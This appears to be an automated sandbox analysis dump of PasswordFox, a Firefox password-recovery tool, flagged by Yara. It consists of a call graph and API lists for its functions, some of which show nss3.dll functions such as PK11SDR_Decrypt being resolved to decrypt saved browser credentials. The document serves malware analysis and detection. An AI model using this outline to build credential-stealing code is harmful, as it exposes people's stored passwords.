5627 404248 wcslen WriteFile 5625->5627 5626 40b038 _snwprintf wcscat 5626->5620 5627->5551 5628->5547 5629->5626 5630->5560 5631->5573 5632->5573 5633->5571 5634->5573 5635->5563 5636->5566 5637->5579 5638->5581 5639->5581 5640->5584 5641->5588 5642->5590 5643->5593 5644->5593 5645->5596 4733 40834b 4765 4056c4 4733->4765 4736 40849e SendMessageW GetModuleHandleW LoadImageW 4737 4084fc GetModuleHandleW CreateWindowExW 4736->4737 4738 401f98 33 API calls 4737->4738 4739 40853e 4738->4739 4740 408584 4739->4740 4773 4026de 4739->4773 4776 407a2b 4740->4776 4743 4085a3 GetModuleHandleW LoadIconW 4744 4085c1 4743->4744 4745 4056c4 16 API calls 4744->4745 4746 4085c9 4745->4746 4747 4050bf _wcsicmp 4746->4747 4748 4085df 4747->4748 4749 408a99 19 API calls 4748->4749 4750 4085f3 SetFocus 4749->4750 4751 40863b wcslen wcslen 4750->4751 4752 40861f 4750->4752 4754 408670 4751->4754 4755 40865b 4751->4755 4753 404571 2 API calls 4752->4753 4756 408624 GetFileAttributesW 4753->4756 4790 407bd6 SendMessageW 4754->4790 4757 40468e 4 API calls 4755->4757 4756->4751 4758 40862f GetTempPathW 4756->4758 4757->4754 4758->4751 4760 40868b 4793 40831a 4760->4793 4766 405557 GetModuleHandleW 4765->4766 4767 4056cb LoadMenuW 4766->4767 4768 4056f7 SetMenu 4767->4768 4769 4056de 4767->4769 4768->4736 4835 405893 4769->4835 4771 4056ee 4842 405568 4771->4842 4774 402704 SendMessageW 4773->4774 4775 4026fa wcslen 4773->4775 4774->4739 4775->4774 4777 407a51 4776->4777 4778 407ad5 4776->4778 4780 407aa3 SendMessageW 4777->4780 4781 407a59 memset SHGetFileInfoW SendMessageW 4777->4781 4779 407b0d GetModuleHandleW LoadImageW GetModuleHandleW LoadImageW 4778->4779 4784 407afb SendMessageW 4778->4784 4785 407b6c GetSysColor 4779->4785 4780->4778 4781->4778 4784->4779 4786 407b8b DeleteObject DeleteObject 4785->4786 4853 4027dd SendMessageW 4786->4853 4789 407bc1 SendMessageW 4789->4743 4791 407bfa SendMessageW 4790->4791 4791->4760 4794 407bd6 2 API calls 4793->4794 4795 408337 4794->4795 
4796 407bd6 2 API calls 4795->4796 4797 408348 RegisterClipboardFormatW 4796->4797 4798 407e37 4797->4798 4854 40676b 4798->4854 4802 407e6b 4803 407e7f 4802->4803 4867 4019fb SendMessageW 4802->4867 4805 40676b 3 API calls 4803->4805 4806 407e8c 4805->4806 4807 4019b4 3 API calls 4806->4807 4808 407eb1 4807->4808 4809 407ec3 4808->4809 4810 4019fb 2 API calls 4808->4810 4811 4019b4 3 API calls 4809->4811 4810->4809 4812 407edf 4811->4812 4813 407ef1 4812->4813 4814 4019fb 2 API calls 4812->4814 4815 4019b4 3 API calls 4813->4815 4814->4813 4816 407f03 4815->4816 4870 406204 4816->4870 4819 4019b4 3 API calls 4820 407f1e 4819->4820 4873 4043a2 4820->4873 4822 407f37 4823 4043a2 3 API calls 4822->4823 4824 407f50 4823->4824 4825 4043a2 3 API calls 4824->4825 4826 407f6c 4825->4826 4827 406204 SendMessageW 4826->4827 4828 407f7a 4827->4828 4829 4019b4 3 API calls 4828->4829 4830 407f94 4829->4830 4831 4019b4 3 API calls 4830->4831 4832 407fb0 4831->4832 4833 407fc2 SendMessageW SendMessageW 4832->4833 4834 4019fb 2 API calls 4832->4834 4834->4833 4836 4058a3 4835->4836 4837 405898 _snwprintf 4835->4837 4836->4837 4840 4058c1 4836->4840 4837->4771 4839 4058d6 wcscpy 4841 4058e2 4839->4841 4840->4839 4840->4841 4841->4771 4843 40b780 4842->4843 4844 405578 GetMenuItemCount 4843->4844 4845 4056bd 4844->4845 4848 405596 4844->4848 4845->4768 4846 40559b memset GetMenuItemInfoW 4846->4848 4847 4055f6 memset wcschr 4847->4848 4848->4845 4848->4846 4848->4847 4849 405568 5 API calls 4848->4849 4850 4058e3 5 API calls 4848->4850 4851 405667 wcscat 4848->4851 4852 40567a ModifyMenuW 4848->4852 4849->4848 4850->4848 4851->4852 4852->4848 4853->4789 4855 4067b2 SendMessageW 4854->4855 4856 406779 4854->4856 4858 4067ab 4855->4858 4856->4855 4857 40677e 4856->4857 4876 402ad0 SendMessageW 4857->4876 4862 4019b4 4858->4862 4861 40678f 4861->4858 4877 402ae4 SendMessageW 4861->4877 4863 4019e2 4862->4863 4864 4019be GetMenu GetSubMenu 4862->4864 4866 4019f1 EnableMenuItem 
4863->4866 4864->4866 4866->4802 4868 401a1d SendMessageW 4867->4868 4868->4803 4878 402ad0 SendMessageW 4870->4878 4872 40620f 4872->4819 4874 4043aa 4873->4874 4875 4043ad GetMenu GetSubMenu CheckMenuItem 4873->4875 4874->4875 4875->4822 4876->4861 4877->4861 4878->4872 5646 401fcb 5647 40b780 5646->5647 5648 401fd8 memset 5647->5648 5669 404cf4 MultiByteToWideChar 5648->5669 5650 40201f 5670 404cdf 5650->5670 5653 404cdf 2 API calls 5654 402043 5653->5654 5673 404cf4 MultiByteToWideChar 5654->5673 5656 402056 5674 404cf4 MultiByteToWideChar 5656->5674 5658 402069 5675 404cf4 MultiByteToWideChar 5658->5675 5660 40207c 5661 4044b1 2 API calls 5660->5661 5662 402093 wcscmp 5661->5662 5663 4020c3 5662->5663 5664 4020ba 5662->5664 5676 401b06 wcslen 5663->5676 5688 406ac6 5664->5688 5669->5650 5671 4044b1 2 API calls 5670->5671 5672 402031 5671->5672 5672->5653 5673->5656 5674->5658 5675->5660 5677 401cab 5676->5677 5687 401b5d 5676->5687 5678 401cf8 log log 5677->5678 5679 401d3f 5677->5679 5681 401d3b _wcsicmp 5678->5681 5682 401d31 free 5678->5682 5680 401d45 free 5679->5680 5679->5681 5680->5681 5681->5664 5682->5681 5684 401c14 abs 5684->5687 5685 4025a8 4 API calls 5686 401c46 abs 5685->5686 5686->5687 5687->5677 5687->5684 5687->5685 5698 4025a8 5687->5698 5689 406aef 5688->5689 5690 406ad6 5688->5690 5691 406b2f 5689->5691 5692 406b0f free 5689->5692 5690->5689 5695 406b18 memcpy 5690->5695 5694 4044df 3 API calls 5691->5694 5693 406b3f 5692->5693 5697 406b49 memcpy 5693->5697 5694->5693 5696 402112 5695->5696 5697->5696 5699 4025b3 5698->5699 5703 4025d1 5698->5703 5700 4025c4 5699->5700 5701 4025bb free 5699->5701 5702 4044df 3 API calls 5700->5702 5701->5703 5702->5703 5703->5687 5704 40b7cc 5705 40b458 2 API calls 5704->5705 5706 40b7d6 5705->5706 4879 40184d 4882 409e0d 4879->4882 4881 401858 4883 409e19 4882->4883 4884 409e1e memcpy memcpy GetModuleHandleW DialogBoxParamW 4882->4884 4883->4881 4884->4881 4885 405b4d 4886 40b780 4885->4886 4887 405b5a 
memset GetDlgCtrlID GetWindowTextW 4886->4887 4888 405bfc 4887->4888 4889 405b9e 4887->4889 4889->4888 4890 405ba7 memset GetClassNameW _wcsicmp 4889->4890 4890->4888 4891 405bef 4890->4891 4892 405a25 5 API calls 4891->4892 4892->4888 5707 408cce 5708 408ce1 5707->5708 5709 408e41 5708->5709 5710 408d00 5708->5710 5755 40896a 5708->5755 5711 408d1b 5710->5711 5713 407e37 11 API calls 5710->5713 5714 408d22 SendMessageW 5711->5714 5715 408d34 5711->5715 5713->5711 5714->5715 5716 408d42 5715->5716 5717 408a26 4 API calls 5715->5717 5718 408d65 5716->5718 5719 407e37 11 API calls 5716->5719 5717->5716 5720 408d78 5718->5720 5764 401aef PostMessageW 5718->5764 5722 408d5e 5719->5722 5721 408ddb 5720->5721 5724 401000 wcsncat 5720->5724 5725 408ded 5721->5725 5765 4088f7 memset 5721->5765 5726 40831a 2 API calls 5722->5726 5727 408d99 5724->5727 5729 408e1a 5725->5729 5732 408e03 5725->5732 5733 406211 SendMessageW 5725->5733 5726->5718 5731 401000 wcsncat 5727->5731 5730 408e51 5729->5730 5729->5732 5734 408e46 5729->5734 5736 408e5f 5730->5736 5770 40883c GetTempPathW 5730->5770 5735 408da9 5731->5735 5737 406211 SendMessageW 5732->5737 5733->5729 5739 406211 SendMessageW 5734->5739 5738 401515 2 API calls 5735->5738 5741 408e7e 5736->5741 5744 407e37 11 API calls 5736->5744 5737->5709 5743 408dbe SetFocus 5738->5743 5739->5730 5742 408e8e 5741->5742 5784 408c2d 5741->5784 5747 408e9e 5742->5747 5749 408c2d 39 API calls 5742->5749 5743->5721 5745 408e77 5744->5745 5748 40831a 2 API calls 5745->5748 5753 408ed1 5747->5753 5789 40309e ??2@YAPAXI 5747->5789 5748->5741 5749->5747 5751 408ef1 5751->5709 5812 407868 5751->5812 5753->5751 5806 4067cb 5753->5806 5756 40b780 5755->5756 5757 40897a memset 5756->5757 5815 4015c1 5757->5815 5760 408a0f 5760->5710 5761 409e76 6 API calls 5762 4089ec 5761->5762 5818 401aef PostMessageW 5762->5818 5764->5720 5819 4086ef memset 5765->5819 5768 408966 5768->5725 5771 408860 GetWindowsDirectoryW 5770->5771 5772 40886e 
GetTempFileNameW 5770->5772 5771->5772 5773 4087f2 38 API calls 5772->5773 5774 4088ab 5773->5774 5775 4088f3 5774->5775 5776 4088af OpenClipboard 5774->5776 5775->5736 5777 4088ce GetLastError 5776->5777 5778 4088bf 5776->5778 5780 4088cb 5777->5780 5885 4043cd EmptyClipboard 5778->5885 5781 4088e6 DeleteFileW 5780->5781 5782 40428f 9 API calls 5780->5782 5781->5775 5783 4088e5 5782->5783 5783->5781 5785 4087f2 38 API calls 5784->5785 5786 408c4d 5785->5786 5787 408c5d 5786->5787 5896 40496b ShellExecuteW 5786->5896 5787->5742 5790 4030b8 5789->5790 5791 4030d2 5790->5791 5792 4030c9 ??3@YAXPAX 5790->5792 5793 4027f1 2 API calls 5791->5793 5792->5791 5794 4030de ??2@YAPAXI memset 5793->5794 5795 405fdc 2 API calls 5794->5795 5796 403113 5795->5796 5797 403118 ??2@YAPAXI 5796->5797 5799 40313c 5796->5799 5797->5799 5798 401515 2 API calls 5800 403164 5798->5800 5799->5798 5801 403182 SetFocus 5800->5801 5802 405f41 SendMessageW 5800->5802 5803 403192 ??3@YAXPAX 5801->5803 5804 40319b 5801->5804 5805 403174 InvalidateRect 5802->5805 5803->5804 5804->5753 5805->5801 5807 4027f1 2 API calls 5806->5807 5810 4067da 5807->5810 5808 40680c 5808->5751 5809 4067ea SendMessageW 5809->5810 5811 4067f9 SendMessageW 5809->5811 5810->5808 5810->5809 5811->5810 5813 407873 GetModuleHandleW 752419E0 5812->5813 5814 4078ca 5812->5814 5813->5709 5814->5709 5816 401515 2 API calls 5815->5816 5817 4015cf 5816->5817 5817->5760 5817->5761 5818->5760 5820 4053f1 16 API calls 5819->5820 5821 408733 5820->5821 5822 4053f1 16 API calls 5821->5822 5823 408744 5822->5823 5824 4053f1 16 API calls 5823->5824 5825 408754 5824->5825 5826 4053f1 16 API calls 5825->5826 5827 408762 5826->5827 5828 4053f1 16 API calls 5827->5828 5829 408777 5828->5829 5830 4053f1 16 API calls 5829->5830 5831 408788 5830->5831 5832 4053f1 16 API calls 5831->5832 5833 408798 5832->5833 5834 4053f1 16 API calls 5833->5834 5835 4087aa 5834->5835 5847 404c22 memset 5835->5847 5838 4053f1 16 API calls 5839 4087c8 
5838->5839 5850 404a67 5839->5850 5841 4087e8 5841->5768 5842 4087f2 5841->5842 5854 4075af 5842->5854 5845 408835 5845->5768 5846 40428f 9 API calls 5846->5845 5848 404c5b _snwprintf wcslen memcpy wcslen memcpy 5847->5848 5848->5848 5849 404ccd 5848->5849 5849->5838 5851 404a74 5850->5851 5852 404ad9 5851->5852 5853 404ac9 wcscpy 5851->5853 5852->5841 5853->5841 5855 4075c1 5854->5855 5856 40652d 3 API calls 5854->5856 5874 40422f CreateFileW 5855->5874 5856->5855 5858 4076eb 5858->5845 5858->5846 5859 4075f5 5876 404177 LoadCursorW SetCursor 5859->5876 5860 4075c9 5860->5858 5860->5859 5875 404afc WriteFile 5860->5875 5863 407604 5864 40763a 5863->5864 5865 407654 5863->5865 5866 406d7d 2 API calls 5863->5866 5864->5865 5867 406c4e 14 API calls 5864->5867 5868 406204 SendMessageW 5865->5868 5866->5864 5867->5865 5873 407669 5868->5873 5869 406811 SendMessageW 5869->5873 5871 4076ac CloseHandle SetCursor 5871->5858 5873->5869 5873->5871 5877 407572 5873->5877 5874->5860 5875->5859 5876->5863 5878 40757b 5877->5878 5879 40758e 5877->5879 5883 402ae4 SendMessageW 5878->5883 5884 402695 SendMessageW 5879->5884 5882 40758a 5882->5873 5883->5882 5884->5882 5895 404216 CreateFileW 5885->5895 5887 4043e5 5888 4043ee GetFileSize GlobalAlloc 5887->5888 5889 40445f GetLastError 5887->5889 5890 404411 GlobalLock ReadFile 5888->5890 5891 404448 GetLastError 5888->5891 5892 404468 CloseClipboard 5889->5892 5890->5891 5893 40442f GlobalUnlock SetClipboardData 5890->5893 5894 404451 CloseHandle 5891->5894 5892->5780 5893->5894 5894->5892 5895->5887 5896->5787 3875 416951 3878 41695c VirtualProtect 3875->3878 3877 4169d5 3878->3877 4893 402e51 4894 402e69 4893->4894 4897 402f99 4893->4897 4895 402f71 SendDlgItemMessageW 4894->4895 4898 402e74 4894->4898 4896 402cde 13 API calls 4895->4896 4899 402f6c 4896->4899 4901 402fb6 4897->4901 4967 402b79 4897->4967 4898->4899 4908 402e9e 4898->4908 4932 402c12 GetDlgItem GetDlgItemInt 4898->4932 4901->4899 4902 40302b 4901->4902 4972 
402695 SendMessageW 4901->4972 4902->4899 4975 40143c GetDlgItem EnableWindow 4902->4975 4903 402ee2 4904 402f00 4903->4904 4905 402ef5 GetDlgItem 4903->4905 4911 402f13 4904->4911 4912 402f08 GetDlgItem 4904->4912 4947 40292d SendMessageW 4905->4947 4908->4899 4908->4903 4936 402cde GetDlgItem SendMessageW SendMessageW 4908->4936 4916 402f29 4911->4916 4917 402f1b GetDlgItem 4911->4917 4952 402970 SendMessageW 4912->4952 4913 402fed 4913->4902 4973 40143c GetDlgItem EnableWindow 4913->4973 4921 402f41 4916->4921 4922 402f33 GetDlgItem 4916->4922 4957 4029ac SendMessageW 4917->4957 4918 403056 4976 40143c GetDlgItem EnableWindow 4918->4976 4924 402f50 EndDialog 4921->4924 4925 402f57 4921->4925 4927 4029ac 3 API calls 4922->4927 4924->4925 4925->4899 4962 402c6a GetDlgItem 4925->4962 4926 403011 4974 40143c GetDlgItem EnableWindow 4926->4974 4927->4921 4928 403072 SetDlgItemInt 4928->4899 4933 402c46 4932->4933 4934 402c54 4932->4934 4977 402ab0 SendMessageW 4933->4977 4934->4908 4937 402d1d SendMessageW 4936->4937 4937->4937 4938 402d2d 4937->4938 4939 4026de 2 API calls 4938->4939 4940 402d44 4939->4940 4941 402e31 4940->4941 4943 402d77 memset SendMessageW 4940->4943 4979 402761 4940->4979 4982 402b01 SendMessageW 4940->4982 4983 40266f SendMessageW 4941->4983 4943->4940 4944 402e3e SetFocus 4944->4903 4948 40296c 4947->4948 4950 40294b 4947->4950 4948->4904 4950->4948 4984 402695 SendMessageW 4950->4984 4985 40280c 4950->4985 4955 402989 4952->4955 4953 4029a8 4953->4911 4955->4953 4956 40280c 7 API calls 4955->4956 5003 402695 SendMessageW 4955->5003 4956->4955 4958 4029f4 4957->4958 4960 4029cb 4957->4960 4958->4916 4960->4958 5004 402695 SendMessageW 4960->5004 5005 402b01 SendMessageW 4960->5005 4963 402cda EndDialog 4962->4963 4966 402c92 4962->4966 4963->4899 4966->4963 5006 4026ad 4966->5006 5009 402ae4 SendMessageW 4966->5009 5011 402ae4 SendMessageW 4967->5011 4969 402b86 5012 402b01 SendMessageW 4969->5012 4971 402b99 4971->4901 4972->4913 4973->4926 
4974->4902 4975->4918 4976->4928 4978 402ac8 4977->4978 4978->4934 4980 402784 wcslen 4979->4980 4981 40278e SendMessageW 4979->4981 4980->4981 4981->4940 4982->4940 4983->4944 4984->4950 4986 402819 4985->4986 4997 4027b6 SendMessageW 4986->4997 4988 40284b 4998 4027b6 SendMessageW 4988->4998 4990 402862 4991 402929 4990->4991 4992 402877 SendMessageW SendMessageW 4990->4992 4991->4950 4999 4027f1 4992->4999 4994 402b9d SendMessageW 4995 4028b3 4994->4995 4995->4991 4995->4994 4996 402b34 SendMessageW 4995->4996 4996->4995 4997->4988 4998->4990 5002 4027dd SendMessageW 4999->5002 5001 4027fa SendMessageW 5001->4995 5002->5001 5003->4955 5004->4960 5005->4960 5010 4027b6 SendMessageW 5006->5010 5008 4026c6 5008->4966 5009->4966 5010->5008 5011->4969 5012->4971 5013 402551 5014 4064f2 SendMessageW 5013->5014 5015 402570 5014->5015 5018 404762 5015->5018 5019 404778 5018->5019 5027 402586 5018->5027 5028 40473c modf 5019->5028 5021 4047a3 5029 40473c modf 5021->5029 5023 404805 5030 40473c modf 5023->5030 5025 40482f 5031 40473c modf 5025->5031 5028->5021 5029->5023 5030->5025 5031->5027 5897 40b6d1 5898 40b6e4 _c_exit 5897->5898 5899 40b6dd _exit 5897->5899 5900 40b6ea 5898->5900 5899->5898 5032 401e52 5033 401e69 5032->5033 5035 401e83 5032->5035 5034 401e70 _ultow 5033->5034 5033->5035 5036 401ed2 5033->5036 5034->5035 5036->5035 5037 4053f1 16 API calls 5036->5037 5037->5035 5038 40b853 5039 40b863 5038->5039 5040 40b85c FreeLibrary 5038->5040 5040->5039 5041 402353 5042 402360 5041->5042 5058 404248 wcslen WriteFile 5042->5058 5044 402375 memset memset memset 5045 4023e5 5044->5045 5046 4023c7 _snwprintf 5044->5046 5047 402400 _snwprintf 5045->5047 5048 4023ed wcscpy 5045->5048 5046->5045 5059 404248 wcslen WriteFile 5047->5059 5048->5047 5051 402450 5052 4053f1 16 API calls 5051->5052 5053 402460 _snwprintf 5052->5053 5060 404248 wcslen WriteFile 5053->5060 5055 402486 5056 40249a 5055->5056 5061 4073d9 ??2@YAPAXI 5055->5061 5058->5044 5059->5051 5060->5055 
5062 4073fe 5061->5062 5065 40b0b3 5062->5065 5066 40b780 5065->5066 5067 40b0c0 memset memset memset 5066->5067 5068 40b111 5067->5068 5069 40b13a 5067->5069 5082 40aeb5 _snwprintf 5068->5082 5070 40b17a _snwprintf 5069->5070 5083 40aeb5 _snwprintf 5069->5083 5084 404248 wcslen WriteFile 5070->5084 5074 40b120 _snwprintf 5074->5069 5075 40b14f _snwprintf wcscpy 5075->5070 5076 40b1a6 5077 40b1be memset 5076->5077 5079 40b200 _snwprintf 5076->5079 5081 407440 ??3@YAXPAX 5076->5081 5077->5076 5078 40b1dd _snwprintf 5077->5078 5078->5079 5085 404248 wcslen WriteFile 5079->5085 5081->5056 5082->5074 5083->5075 5084->5076 5085->5076 4148 40ab55 4151 40a8e8 4148->4151 4152 40a8f5 4151->4152 4153 40a914 memset 4152->4153 4154 40a947 memset GetPrivateProfileStringW 4152->4154 4164 404b1b 4153->4164 4159 404ba4 wcslen 4154->4159 4158 40a986 4160 404bb8 4159->4160 4161 404bba 4159->4161 4160->4158 4162 404bf0 wcstoul 4161->4162 4163 404c0e 4161->4163 4162->4161 4163->4158 4166 404b2f 4164->4166 4167 404b8f WritePrivateProfileStringW 4164->4167 4165 404b3d _snwprintf memcpy 4165->4166 4165->4167 4166->4165 4166->4167 4167->4158 5901 4014d6 5902 4014e2 ExitProcess 5901->5902 5903 4014ea 5901->5903 5086 407457 memset memset 5093 404248 wcslen WriteFile 5086->5093 5088 4074a4 5094 406b6d wcscpy 5088->5094 5090 4074ba _snwprintf 5097 404248 wcslen WriteFile 5090->5097 5092 4074e2 5093->5088 5095 406b80 5094->5095 5096 406b92 _wcslwr 5095->5096 5096->5090 5097->5092 5907 4078da 5912 4078f0 5907->5912 5913 407969 5907->5913 5908 407921 wcscmp 5908->5912 5909 407928 _wcsicmp 5909->5912 5911 40434a 3 API calls 5911->5912 5912->5908 5912->5909 5912->5911 5912->5913 5914 4042f2 wcslen wcslen 5912->5914 5915 404319 5914->5915 5916 40433d 5914->5916 5915->5916 5917 404321 memcmp 5915->5917 5916->5912 5917->5915 5917->5916 5101 40145d 5102 401469 5101->5102 5106 401490 5102->5106 5107 405810 5102->5107 5108 40581d 5107->5108 5109 40147d 5108->5109 5110 405834 memset 5108->5110 5116 

                                        Control-flow Graph

                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000103,0000038B,?,?,00409A61,00000000,?), ref: 004051A2
                                        • FindNextFileW.KERNELBASE(000000FF,0000038B,?,?,00409A61,00000000,?), ref: 004051C0
                                        • wcslen.MSVCRT ref: 004051F0
                                        • wcslen.MSVCRT ref: 004051F8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFindwcslen$FirstNext
                                        • String ID:
                                        • API String ID: 2163959949-0
                                        • Opcode ID: e58e1da017f2d9b9f2487bc1bcf131eac75da02d1244eea9b71b4f5dc18f09ad
                                        • Instruction ID: 72756ae5bf3a82a9770dd2a85ed3f342837e44ccf599ea45002739566ca04d91
                                        • Opcode Fuzzy Hash: e58e1da017f2d9b9f2487bc1bcf131eac75da02d1244eea9b71b4f5dc18f09ad
                                        • Instruction Fuzzy Hash: F011C272505604AED320DB64D884A9B73DCEF44324F204A3FF45AE31C1EB38A9008F69

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004025F0: LoadLibraryW.KERNEL32(comctl32.dll), ref: 0040260F
                                          • Part of subcall function 004025F0: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402621
                                          • Part of subcall function 004025F0: FreeLibrary.KERNEL32(00000000), ref: 00402635
                                          • Part of subcall function 004025F0: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402660
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00409583
                                        • GetModuleHandleW.KERNEL32(00000000,0040AC82,00000000), ref: 0040959C
                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004095A3
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 0040961A
                                        • DeleteObject.GDI32(?), ref: 00409634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 3591293073-28296030
                                        • Opcode ID: d4026ab066b5786ef66ee6970bd6b009e7292194a54210e320ad5b8e2977d184
                                        • Instruction ID: 178a9fccab303593a6279fae082693933da09ea4deade59eeb096ff544fa0fd7
                                        • Opcode Fuzzy Hash: d4026ab066b5786ef66ee6970bd6b009e7292194a54210e320ad5b8e2977d184
                                        • Instruction Fuzzy Hash: 95516071408346DBD720AFA1DD88A5FBBE8FF85344F00093EF585A2192D7799805CF9A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00409EDC
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 00409F25
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 00409F32
                                        • memset.MSVCRT ref: 00409F4C
                                        • wcslen.MSVCRT ref: 00409F59
                                        • wcslen.MSVCRT ref: 00409F68
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00409FA3
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FBF
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FD6
                                        • GetProcAddress.KERNEL32(?,NSS_Init), ref: 00409FEB
                                        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00409FF7
                                        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040A003
                                        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040A00F
                                        • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040A01B
                                        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040A027
                                        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040A033
                                          • Part of subcall function 0040353E: memset.MSVCRT ref: 0040355F
                                          • Part of subcall function 0040353E: memset.MSVCRT ref: 004035AC
                                          • Part of subcall function 0040353E: RegCloseKey.ADVAPI32(?), ref: 004036DF
                                          • Part of subcall function 0040353E: wcscpy.MSVCRT ref: 004036ED
                                          • Part of subcall function 0040353E: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 00403704
                                          • Part of subcall function 0040353E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104), ref: 00403740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                        • API String ID: 2554026968-4029219660
                                        • Opcode ID: 9ef94111156cac9d1b3b72124b0fa32533121e735b70d91af15a6f43e3620ccd
                                        • Instruction ID: 5684c35a9538609956853511e72be201b8ec69360c76df797af2ef85c1c6d806
                                        • Opcode Fuzzy Hash: 9ef94111156cac9d1b3b72124b0fa32533121e735b70d91af15a6f43e3620ccd
                                        • Instruction Fuzzy Hash: 62418271940308AACB20DF61CC8599AB7F9FF58344F10497FE585E21D2E7789A888B5D

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00409EBB: memset.MSVCRT ref: 00409EDC
                                          • Part of subcall function 00409EBB: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 00409F25
                                          • Part of subcall function 00409EBB: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 00409F32
                                          • Part of subcall function 00409EBB: memset.MSVCRT ref: 00409F4C
                                          • Part of subcall function 00409EBB: wcslen.MSVCRT ref: 00409F59
                                          • Part of subcall function 00409EBB: wcslen.MSVCRT ref: 00409F68
                                          • Part of subcall function 00409EBB: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00409FA3
                                          • Part of subcall function 00409EBB: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FBF
                                          • Part of subcall function 00409EBB: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FD6
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00409FEB
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00409FF7
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040A003
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040A00F
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040A01B
                                        • memset.MSVCRT ref: 00403EDA
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 00403EF1
                                        • memset.MSVCRT ref: 00403F2A
                                        • memset.MSVCRT ref: 00403F44
                                        • memset.MSVCRT ref: 00403F5E
                                        • memset.MSVCRT ref: 00403F78
                                        • wcslen.MSVCRT ref: 00403F83
                                        • wcslen.MSVCRT ref: 00403F91
